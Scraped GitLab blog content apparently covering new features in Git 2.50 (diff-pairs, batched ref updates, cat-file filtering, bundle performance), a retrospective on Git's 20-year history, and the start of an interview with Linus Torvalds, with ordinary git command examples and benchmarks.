tab](https://docs.gitlab.com/user/project/merge_requests/changes/).\nBehind the scenes, diff generation is powered by\n[`git-diff(1)`](https://git-scm.com/docs/git-diff). For example:\n\n```shell\n$ git diff HEAD~1 HEAD\n```\n\nThis command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. 
For large change sets, it would be better if\nthere were a way to break diff computation into smaller, more digestible chunks.\n\nOne way this can be achieved is by using\n[`git-diff-tree(1)`](https://git-scm.com/docs/git-diff-tree) to retrieve info\nabout all the changed files:\n\n```shell\n$ git diff-tree -r -M --abbrev HEAD~ HEAD\n:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc\n:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN\n```\n\nGit refers to this output as the [\"raw\" format](https://git-scm.com/docs/git-diff-tree#_raw_output_format).\nIn short, each line of output lists filepairs and the accompanying metadata\nabout what has changed between the start and end revisions. Compared to\ngenerating the \"patch\" output for large changes, this process is relatively\nquick and provides a summary of everything that changed. This command can optionally perform rename detection by  appending the `-M` flag to check if identified changes were due to a file rename.\n\nWith this information, we could use `git-diff(1)` to compute each of the\nfilepair diffs individually. For example, we can provide the blob IDs\ndirectly:\n\n```shell\n$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f\n```\n\nWe can repeat this process for each of the filepairs, but spinning up a\nseparate Git process for each individual file diff is not very efficient.\nFurthermore, when using blob IDs, the diff loses some contextual information\nsuch as the change status, and file modes which are stored in with the parent\ntree object. What we really want is a mechanism to feed \"raw\" filepair info and\ngenerate the corresponding patch output.\n\nWith the 2.50 release, Git has a new built-in command named\n[`git-diff-pairs(1)`](https://git-scm.com/docs/git-diff-pairs). This command\naccepts \"raw\" formatted filepair info as input on stdin to determine exactly which patches to output. 
The following example showcases how this command could be\nused:\n\n```shell\n$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z\n```\n\nWhen used in this manner, the resulting output is identical to using `git-diff(1)`.\nBy having a separate command to generate patch output, the \"raw\" output from\n`git-diff-tree(1)` can be broken up into smaller batches of filepairs and fed to separate\n`git-diff-pairs(1)` processes. This solves the previously mentioned scalability\nconcern because diffs no longer have to be computed all at once. Future GitLab\nreleases could build upon this mechanism to improve diff\ngeneration performance, especially in cases where large change sets are\nconcerned. For more information on this change, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/20250228213346.1335224-1-jltobler@gmail.com/).\n\n_This project was led by [Justin Tobler](https://gitlab.com/justintobler)._\n\n## Batched reference updates\n\nGit provides the [`git-update-ref(1)`](https://git-scm.com/docs/git-update-ref)\ncommand to perform reference updates. When used with the `--stdin` flag,\nmultiple reference updates can be batched together in a single transaction by\nspecifying instructions for each reference update to be performed on stdin.\nBulk updating references in this manner also provides atomic behavior whereby a\nsingle reference update failure results in an aborted transaction and no\nreferences being updated. 
Here is an example showcasing this behavior:\n\n```shell\n# Create repository with three empty commits and branch named \"foo\"\n$ git init\n$ git commit --allow-empty -m 1\n$ git commit --allow-empty -m 2\n$ git commit --allow-empty -m 3\n$ git branch foo\n\n# Print out the commit IDs\n$ git rev-list HEAD\ncf469bdf5436ea1ded57670b5f5a0797f72f1afc\n5a74cd330f04b96ce0666af89682d4d7580c354c\n5a6b339a8ebffde8c0590553045403dbda831518\n\n# Attempt to create a new reference and update existing reference in transaction.\n# Update is expected to fail because the specified old object ID doesn’t match.\n$ git update-ref --stdin \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nfatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c\n\n# The \"bar\" reference was not created.\n$ git switch bar\nfatal: invalid reference: bar\n```\n\nCompared to updating many references individually, updating in bulk is also\nmuch more efficient. While this works well, there might be certain\ncircumstances where it is okay for a subset of the requested reference updates\nto fail, but we still want to take advantage of the efficiency gains of bulk\nupdates.\n\nWith this release, `git-update-ref(1)` has the new `--batch-updates` option,\nwhich allows the updates to proceed even when one or more reference updates\nfails. In this mode, individual failures are reported in the following format:\n\n```text\nrejected SP (\u003Cold-oid> | \u003Cold-target>) SP (\u003Cnew-oid> | \u003Cnew-target>) SP \u003Crejection-reason> LF\n```\n\nThis allows successful reference updates to proceed while providing context to\nwhich updates were rejected and for what reason. 
Using the same example\nrepository from the previous example:\n\n```shell\n# Attempt to create a new reference and update existing reference in transaction.\n$ git update-ref --stdin --batch-updates \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nrejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided\n\n# The \"bar\" reference was created even though the update to \"foo\" was rejected.\n$ git switch bar\nSwitched to branch 'bar'\n```\n\nThis time, with the `--batch-updates` option, the reference creation succeeded\neven though the update didn't work. This patch series lays the groundwork for\nfuture performance improvements in `git-fetch(1)` and `git-receive-pack(1)`\nwhen references are updated in bulk. For more information, check the\n[mailing-list thread](https://lore.kernel.org/git/20250408085120.614893-1-karthik.188@gmail.com/).\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## New filter option for git-cat-file(1)\n\nWith [`git-cat-file(1)`](https://git-scm.com/docs/git-cat-file), it is possible\nto print info for all objects contained in the repository via the\n`--batch-all-objects` option. 
For example:\n\n```shell\n# Setup simple repository.\n$ git init\n$ echo foo >foo\n$ git add foo\n$ git commit -m init\n\n# Create an unreachable object.\n$ git commit --amend --no-edit\n\n# Use git-cat-file(1) to print info about all objects including unreachable objects.\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ntree 205f6b799e7d5c2524468ca006a0131aa57ecce7\nblob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nIn some situations, a user might want to search through all objects in the\nrepository, but only output a subset based on some specified attribute. For\nexample, if we wanted to see only the objects that are commits, we could use\n`grep(1)`:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nWhile this works, one downside with filtering the output is that\n`git-cat-file(1)` still has to traverse all the objects in the repository, even\nthe ones that the user is not interested in. This can be rather inefficient.\n\nWith this release, `git-cat-file(1)` now has the `--filter` option, which only\nshows objects matching the specified criteria. This is similar to the option of\nthe same name for `git-rev-list(1)`, but with only a subset of the filters\nsupported. The supported filters are `blob:none`, `blob:limit=`, as well as\n`object:type=`. 
Similar to the previous example, objects can be filtered by\ntype with Git directly:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nNot only is it convenient for Git to handle the processing, for large\nrepositories with many objects, it is also potentially more efficient. If a\nrepository has bitmap indices, it becomes possible for Git to efficiently\nlookup objects of a specific type, and thus avoid scanning through the\npackfile, which leads to a significant speedup. Benchmarks conducted on the\n[Chromium repository](https://github.com/chromium/chromium.git) show\nsignificant improvements:\n\n```text\nBenchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]\n   Range (min … max):   73.936 s … 89.690 s    10 runs\n\nBenchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]\n   Range (min … max):    18.2 ms …  23.6 ms    127 runs\n\nBenchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]\n   Range (min … max):    1.541 s …  1.566 s    10 runs\n\nBenchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]\n   Range (min … max):   11.114 s … 11.245 s    10 runs\n\nBenchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]\n   Range (min … max):   62.836 s … 
73.618 s    10 runs\n\nBenchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]\n   Range (min … max):   12.960 s … 13.199 s    10 runs\n\nSummary\n   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none\n  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n```\n\nInterestingly, these results indicate that the computation time now scales with\nthe number of objects for a given type instead of the number of total objects\nin the packfile. The original mailing-list thread can be found\n[here](https://lore.kernel.org/git/20250221-pks-cat-file-object-type-filter-v1-0-0852530888e2@pks.im/).\n\n_This project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab)._\n\n## Improved performance when generating bundles\n\nGit provides a means to generate an archive of a repository which contains a\nspecified set of references and accompanying reachable objects via the\n[`git-bundle(1)`](https://git-scm.com/docs/git-bundle) command. This operation\nis used by GitLab to generate repository backups and also as part of the\n[bundle-URI](https://git-scm.com/docs/bundle-uri) mechanism.\n\nFor large repositories containing millions of references, this operation can\ntake hours or even days. 
For example, with the main GitLab repository\n([gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab)), backup times were\naround 48 hours. Investigation revealed there was a performance bottleneck due\nto how Git was performing a check to avoid duplicated references being included\nin the bundle. The implementation used a nested `for` loop to iterate and\ncompare all listed references, leading to O(N^2) time complexity. This scales\nvery poorly as the number of references in a repository increases.\n\nIn this release, this issue was addressed by replacing the nested loops with a\nmap data structure leading to a significant speedup. The following benchmark shows\nthe performance improvement for creating a bundle with a repository containing\n100,000 references:\n\n```text\nBenchmark 1: bundle (refcount = 100000, revision = master)\n  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]\n  Range (min … max):   14.237 s … 14.920 s    10 runs\n\nBenchmark 2: bundle (refcount = 100000, revision = HEAD)\n  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]\n  Range (min … max):    2.364 s …  2.425 s    10 runs\n\nSummary\n  bundle (refcount = 100000, revision = HEAD) ran\n    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)\n```\n\nTo learn more, check out our blog post\n[How we decreased GitLab repo backup times from 48 hours to 41 minutes](https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/).\nYou can also find the original mailing list thread\n[here](https://lore.kernel.org/git/20250401-488-generating-bundles-with-many-references-has-non-linear-performance-v1-0-6d23b2d96557@gmail.com/).\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## Better bundle URI unbundling\n\nThrough the [bundle URI](https://git-scm.com/docs/bundle-uri) mechanism in Git,\nlocations to fetch bundles from can be provided to clients with the 
goal to\nhelp speed up clones and fetches. When a client downloads a bundle, references\nunder `refs/heads/*` are copied from the bundle into the repository along with\ntheir accompanying objects. A bundle might contain additional references\noutside of `refs/heads/*` such as `refs/tags/*`, which are simply ignored when\nusing bundle URI on clone.\n\nIn Git 2.50, this restriction is lifted, and all references\nmatching `refs/*` contained in the downloaded bundle are copied.\n[Scott Chacon](https://github.com/schacon), who contributed this functionality,\ndemonstrates the difference when cloning\n[gitlab-org/gitlab-foss](https://gitlab.com/gitlab-org/gitlab-foss):\n\n```shell\n$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49\nCloning into 'gl-2.49'...\nremote: Enumerating objects: 1092703, done.\nremote: Counting objects: 100% (973405/973405), done.\nremote: Compressing objects: 100% (385827/385827), done.\nremote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)\nReceiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.\nResolving deltas: 100% (710976/710976), completed with 9081 local objects.\nChecking objects: 100% (4194304/4194304), done.\nChecking connectivity: 959668, done.\nUpdating files: 100% (59972/59972), done.\n\n$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50\nCloning into 'gl-2.50'...\nremote: Enumerating objects: 65538, done.\nremote: Counting objects: 100% (56054/56054), done.\nremote: Compressing objects: 100% (28950/28950), done.\nremote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)\nReceiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.\nResolving deltas: 100% (27401/27401), completed with 8564 local objects.\nUpdating files: 100% (59972/59972), done.\n```\n\nComparing these results, we see that Git 2.50 fetches 43,877 objects\n(40.42 MiB) 
after the bundle was extracted whereas Git 2.49 fetches a\ntotal of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer\nobjects and 90% less data, which benefits both the client and the server. The\nserver needs to send a lot less data to the client and the client needs to\ndownload and extract less data. In the example provided by Scott this led to a\nspeedup of 25%.\n\nTo learn more, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/pull.1897.git.git.1740489585344.gitgitgadget@gmail.com/).\n\n_This patch series was contributed by [Scott Chacon](https://github.com/schacon)._\n\n## Read more\n\nThis article highlighted just a few of the contributions made by GitLab and\nthe wider Git community for this latest release. You can learn about these from\nthe [official release announcement](https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/) of the Git project. Also, check\nout our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/)\nto see other past highlights of contributions from GitLab team members.\n","2025-06-16",[983,900,267],{"featured":91,"template":789,"slug":1060},"what-s-new-in-git-2-50-0",{"content":1062,"config":1071},{"title":1063,"description":1064,"authors":1065,"heroImage":1067,"date":1068,"body":1069,"category":747,"tags":1070},"Journey through Git's 20-year history","Follow along as we reminisce about the first commit, the unique aspects of the earliest releases, and the confusion sparked by an update to the git-push(1) default behavior.",[1066],"Patrick Steinhardt","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097380/Blog/Hero%20Images/Blog/Hero%20Images/git-20-years-opt2_TWNsNk8KH43b3jP0KLD0U_1750097380123.png","2025-04-14","The Git project has just turned 20 years old. 
A lot has happened during these years, and while the conceptual design of Git hasn't changed significantly since its inception, the way users interact with the tool has changed quite significantly. We at GitLab are proud to build on top of this critical piece of software and to be part of its history.\n\nJoin us on a journey through Git's history to explore how it has evolved over the years.\n\n## The first commit\n\nThe first commit was made on April 7, 2005, by Linus Torvalds, the creator of the Linux kernel: `e83c5163316 (Initial revision\nof \"git\", the information manager from hell, 2005-04-07)`.\n\nAs we can see, this\ncommit does not contain a lot of files:\n\n```shell\n$ git ls-tree e83c5163316\n100644 blob a6bba79ba1f46a1bbf7773449c3bd2bb9bf48e8b\tMakefile\n100644 blob 27577f76849c09d3405397244eb3d8ae1d11b0f3\tREADME\n100644 blob 98a32a9ad39883c6d05a000a68511d4b1ee2b3c7\tcache.h\n100644 blob 74a0a234dd346fff51c773aa57d82fc4b83a8557\tcat-file.c\n100644 blob 840307af0cfaab31555795ce7175d5e9c9f981a0\tcommit-tree.c\n100644 blob 25dc13fe101b219f74007f3194b787dd99e863da\tinit-db.c\n100644 blob c924a6e0fc4c36bad6f23cb87ee59518c771f936\tread-cache.c\n100644 blob 1b47742d8cbc0d98903777758b7b519980e7499e\tread-tree.c\n100644 blob b8522886a15db861508fb6d03d4d88d6de912a4b\tshow-diff.c\n100644 blob 5085a5cb53ee52e1886ff6d46c609bdb2fc6d6cd\tupdate-cache.c\n100644 blob 921f981353229db0c56103a52609d35aff16f41b\twrite-tree.c\n```\n\nIn addition to build infrastructure, the first commit provides seven top-level commands:\n\n- `init-db` to initialize a new Git repository\n- `update-cache` to add files to the index\n- `write-tree` to take what is in the index and create a new tree from it\n- `read-tree` to read a tree object\n- `commit-tree` to create a commit from a tree\n- `cat-file` to read a specific object into a temporary file\n- `show-diff` to show changes between the index and the working tree\n\nNote that the `git` command itself did not yet exist at this point in time.\nInstead, these commands had to be executed directly.\n\nAs an 
example, let's create a\nnew repository:\n\n```shell\n$ mkdir repo\n$ cd repo\n$ init-db\ndefaulting to private storage area\n$ ls -a\n.  ..  .dircache\n```\n\nThat looks quite unfamiliar: There is no `.git` directory, but there is a\n`.dircache` directory. And where was the private storage area?\n\nThe early design of Git distinguished between a \"shared\" and \"private\" object\nstorage area. This object storage area was where all of your Git objects went. For example, your\ncommits and blobs.\n\nBy default, `init-db` created a private object storage area that was only used for\nthe managed directory that it was created in. A \"shared\" object storage area, on\nthe other hand, shared object content across multiple managed directories so\nthat the same object did not need to be stored twice.\n\n### Create a commit\n\nSo, now that we have a repository, how did we create a commit? Well, it isn't as\neasy as today's `git add . && git commit`. Instead, you had to:\n\n1. Update the index by calling `update-cache` for every file that you want to\n   add.\n1. Write a new tree by calling `write-tree`, which takes everything you have\n   added to the index.\n1. Set up environment variables to tell Git who you are.\n1. Write a commit object by calling `commit-tree`.\n\nLet’s create a commit in the repository:\n\n```shell\n$ echo content-1 >file-a\n$ update-cache file-a\n$ echo content-2 >file-b\n$ update-cache file-b\n$ write-tree\n3f143dfb48f2d84936626e2e5402e1f10c2050fb\n$ export COMMITTER_NAME=\"Patrick Steinhardt\"\n$ export COMMITTER_EMAIL=ps@pks.im\n$ echo \"commit message\" | commit-tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nCommitting initial tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\n5f8e928066c03cebe5fd0a0cc1b93d058155b969\n```\n\nThis isn't exactly ergonomic, but it works! 
Let's have a look at the generated\ncommit:\n\n```shell\n$ cat-file 5f8e928066c03cebe5fd0a0cc1b93d058155b969\ntemp_git_file_rlTXtE: commit\n$ cat temp_git_file_rlTXtE\ntree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nauthor Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\ncommitter Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\n\ncommit message\n```\n\nNote that `cat-file` didn't print the contents directly, but instead wrote\nit into a temporary file first. But the contents of the file looked exactly how a\nmodern commit would look.\n\n### Making changes\n\nNow that we have files, how do we get their status? You might have guessed it:\nthis could be done with `show-diff`:\n\n```shell\n$ show-diff\nfile-a: ok\nfile-b: ok\n\n$ echo modified-content >file-a\n$ show-diff\n--- -\t2025-03-26 13:14:53.457611094 +0100\n+++ file-a\t2025-03-26 13:14:52.230085756 +0100\n@@ -1 +1 @@\n-content-1\n+modified-content\nfile-a:  46d8be14cdec97aac6a769fdbce4db340e888bf8\nfile-b: ok\n```\n\nAmazingly, `show-diff` even knew to already generate diffs between the old and\nnew state of modified files! Funny enough though, Git achieved this by simply\nexecuting the diff(1) Unix tool.\n\nIn summary, all of this was still rather bare-bones, but it performed all of the\nnecessary duties to track history. There were still many limitations:\n\n- There was no easy way yet to switch between commits.\n- There was no way to show logs.\n- There were no branches, tags, or even references. Users were expected to manually\n  keep track of object IDs.\n- There was no way to synchronize two repositories with one another. Instead,\n  users were expected to use rsync(1) to synchronize the `.dircache` directories.\n- There was no way to perform merges.\n\n## Git 0.99\n\nThe first test release of Git was Version 0.99. This release came only two months after\nthe initial commit, but already contained 1,076 commits. There had been almost 50\ndifferent developers involved. 
The most frequent committer at this point was\nLinus himself, but he was closely followed by Junio Hamano, the current maintainer.\n\nA lot of things had changed since the initial commit:\n\n- Git started to track different development branches by using references, which\n  in most cases removes the need to manually track object IDs.\n- There was a new remote protocol that allows two repositories to exchange\n  objects with one another.\n- The `.dircache` directory was renamed to `.git`.\n- It became possible to merge single files with one another.\n\nThe most important visible change, though, was the introduction of\nthe top-level `git` command and its subcommands. Interestingly, this release\nalso created the notion of \"plumbing\" and \"porcelain\" commands:\n\n- \"Plumbing\" tools are the low-level commands that access the underlying Git\n  repository.\n- \"Porcelain\" tools are shell scripts that wrap the plumbing commands to provide\n  a nicer, high-level user interface.\n\nThis split still exists nowadays as documented in\n[`git(1)`](https://git-scm.com/docs/git#_high_level_commands_porcelain), but because \nmost porcelain tools have been rewritten from shell scripts to C, the line between these two\ncategories has started to blur significantly.\n\n## Linus hands over maintainership\n\nLinus never started Git out of love for version control systems, but because there was a need to replace BitKeeper for Linux kernel development. As such, he never planned to keep maintaining Git forever. The intent was to maintain it until someone trustworthy stepped up.\n\nThat someone was Junio Hamano. Junio got involved in Git about a week after Linus’s first commit and already had a couple of hundred commits in the history after the Git 0.99 release. So, on July 26, 2005, [Linus made Junio the new maintainer of the Git project](https://lore.kernel.org/git/Pine.LNX.4.58.0507262004320.3227@g5.osdl.org/). 
While Linus has continued to contribute to Git, his involvement with the project faded over time, which is only natural considering that he is quite busy as head of the Linux project.\n\nJunio is still leading the Git project today.\n\n## Git 1.0\n\nThe first major release of Git happened on December 21, 2005, by\nJunio. Interestingly enough, there had been 34 releases between Version 0.99\nand Version 1.0: 0.99.1 to 0.99.7, 0.99.7a to 0.99.7d, 0.99.8 to 0.99.8g, and\n0.99.9 up to 0.99.9n.\n\nOne of the more important milestones since 0.99 was probably the addition of the `git-merge(1)`\ncommand that allows one to merge two trees with one another. This is in stark\ncontrast to before, where one had to basically script the merges file by file.\n\n### Remotes\n\nAnother significant change was the introduction of shorthand notation for\nremote repositories. While Git already knew how to talk to remote repositories,\nusers always had to specify the URL to fetch from every single time they wanted\nto fetch changes from it. This was quite unfriendly to the users, because, typically, they wanted to interact with the same remote over and over again.\n\nYou may know about how remotes work now, but the mechanism that existed at  \nthis point in time was still significantly different. There was no `git-remote(1)`  \ncommand that you could use to manage your remotes. Remotes weren't even stored  \nin your `.git/config` file. In fact, when remotes were first introduced in  \nVersion 0.99.2, Git didn't even *have* config files.\n\nInstead, you had to configure remotes by writing a file into the  \n`.git/branches` directory, which nowadays feels somewhat counterintuitive. But  \nthe mechanism still works today:\n\n```shell\n$ git init repo --\nInitialized empty Git repository in /tmp/repo/.git/\n$ cd repo\n$ mkdir .git/branches\n$ echo https://gitlab.com/git-scm/git.git >.git/branches/origin\n$ git fetch origin refs/heads/master\n```\n\nBut that isn't all! 
The directory was soon renamed in Git Version 0.99.5 to \"remotes\", so there are a total of three different ways to configure remotes in a modern Git client.\n\nMost of you have probably never used either `.git/branches` or `.git/remotes`,  \nand both of these mechanisms have been deprecated since 2005 and 2011,  \nrespectively. Furthermore, these directories will finally be removed in Git 3.0.\n\n## Git branding\n\nIn 2007, the first Git logo was created. It’s arguable if you can call it a logo, because it only consisted of three red minus signs above three green plus signs, reflecting what the output of `git diff` looks like:\n\n![three red minus signs above three green plus signs, reflecting what the output of `git diff`](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097387927.png)\n\nA bit later, in 2008, the website [git-scm.com](https://git-scm.com) was launched:\n\n![landing page for git-scm.com in 2008](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image4_aHR0cHM6_1750097387930.png)\n\nIn 2012, the Git website was [revamped](https://lore.kernel.org/git/CAP2yMaJy=1c3b4F72h6jL_454+0ydEQNXYiC6E-ZeQQgE0PcVA@mail.gmail.com/) by Scott Chacon and Jason Long. It looks pretty similar to how it looks today:\n\n![git website revamped in 2012](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097387932.png)\n\nThis site redesign sports the new red-orange logo designed by Jason Long; the same logo that's currently used:\n\n![git logo](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097387934.png)\n\n## Git 2.0\n\nGit already started to look a lot like modern Git at the 1.0 release, so we\nare going to do a big historical jump to Git 2.0. 
This version was\nreleased around 10 years after Git 1.0 and was the first release that\nintentionally contained backwards-incompatible changes in central workflows.\n\n### `git-push(1)` default behavior\n\nThe change that arguably caused most the confusion in this release was the\nupdated default behavior of `git-push(1)`.\n\nThere are a couple of different actions that Git could take when you push\ninto a remote repository and don’t specify exactly what you want to push:\n\n- Git could refuse to do anything, asking you to provide more information of\n  what exactly you want to push.\n- Git could push the currently checked out branch.\n- Git could push the currently checked out branch, but only if it knows that it\n  has an equivalent on the remote side.\n- Git could push all of your branches that have an equivalent on the remote side.\n\nThe behavior of modern Git is the so-called \"simple\" strategy, which is the third\noption above. But before Git 2.0, the default behavior was the \"matching\"\nstrategy, which is the last option.\n\nThe “matching” strategy was significantly more risky. You always had to make sure that you\nwere fine with pushing all of your local branches that have an equivalent on the\nremote side before pushing. Otherwise, you might have ended up\npushing changes unintentionally. As such, it was decided to change the strategy\nto \"simple\" to reduce the risk and help out Git beginners.\n\n### `git-add(1)`\n\nAnother big change was the default behavior of `git-add(1)` when it comes to  \ntracked files that have been deleted. Before Git 2.0, `git-add(1)` wouldn't  \nstage deleted files automatically, but you instead had to manually add each  \ndeleted file by using `git-rm(1)` to make them part of a commit. 
With Git 2.0, this behavior was changed so that `git-add(1)` also adds deleted files to the index.\n\n## Celebrating the Git community\n\nI won’t bore you with the details around how Git works nowadays – you probably use it daily anyway, and, if you don’t, there are many tutorials out there that can help you get started. Instead, let’s celebrate the Git community, which has ensured that Git works as well as it does 20 years later.\n\nOver time, Git has:\n\n- Accumulated 56,721 commits as of the Git 2.49 release.\n- Received contributions from more than 2,000 different individuals.\n- Published 60 major releases.\n\nThe Git project also has a steady influx of new contributors by taking part in [Google Summer of Code](https://summerofcode.withgoogle.com/) and [Outreachy](https://www.outreachy.org/). New contributors like these are what will ensure that the Git project will remain healthy in the long term.\n\nAs such, let me extend a big thank you to all contributors. It is your contributions that have made Git possible.\n\n## Going forward\n\nIt should be an uncontroversial take to say that Git has essentially won the competition of version control systems. It has significant market share, and it isn't easy to find open source projects that are using a version control system other than Git. So it has clearly done a lot of things right.\n\nThat being said, its development hasn't stood still, and there are still many challenges ahead of Git. 
On the one hand, we have technical challenges:\n- modernization of an aging code base  \n- scaling with the ever-growing size of monorepos  \n- handling large binary files better\n\nAnd on the other hand, there are problems of a more social type:\n- improving the usability of Git  \n- fostering the Git community so that the project remains healthy in the long  \n  term\n\nThere always remains work to be done and we at GitLab are proud to be part  \nof these efforts to make sure that Git continues to be a great version control  \nsystem for the next 20 years.\n\n## Read more about Git\n\n- [Celebrating Git's 20th anniversary with creator Linus Torvalds](https://about.gitlab.com/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds/)\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)",[900,983],{"slug":1072,"featured":91,"template":789},"journey-through-gits-20-year-history",{"content":1074,"config":1082},{"title":1075,"description":1076,"authors":1077,"heroImage":1078,"date":1079,"body":1080,"category":747,"tags":1081},"Celebrating Git's 20th anniversary with creator Linus Torvalds","Discover the origins of the open-source version control system, why he handed over the reins a few months in, and what he thinks about adding new programming languages to Git.",[1066],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662510/Blog/Hero%20Images/git-20-years-opt1.png","2025-04-07","The Git version control system was first released on April 7, 2005, by the father of the Linux kernel, Linus Torvalds. 
To mark the 20th anniversary of this important project that is nowadays used by almost every single developer, I interviewed Linus about the history of Git, why he handed over maintainership of Git, and what he considers to be its most important milestones.\n\n**In 2005, you were already the maintainer of the thriving Linux kernel. Why did you decide to start a new version control system?**\n\nSo, I got into it from really despising version control.\n\nI had used the traditional version control systems (CVS/RCS/SCCS) both as an end user (i.e., tracking open source projects like [GCC](https://gcc.gnu.org/)) and as a developer (we used CVS at Transmeta for everything) and absolutely hated the experience with a passion.\n\n\u003Cimg src=\"https://about.gitlab.com/images/blogimages/linustorvalds.png\" align=\"left\" width=\"200px\" style=\"padding-right: 20px; padding-bottom: 10px\"/>\n\nAnd yes, back then most projects that used CVS had probably moved to [SVN](https://subversion.apache.org/), but honestly, I always felt that SVN was just \"lipstick on a pig.\" It was just CVS in another form, with some UI improvements, but none of the fundamentals fixed, and a few new problems added.\n\nThe problems with CVS and its ilk are too many to even list, and, happily, they have largely become irrelevant and younger developers have probably never even had to deal with any of it. 
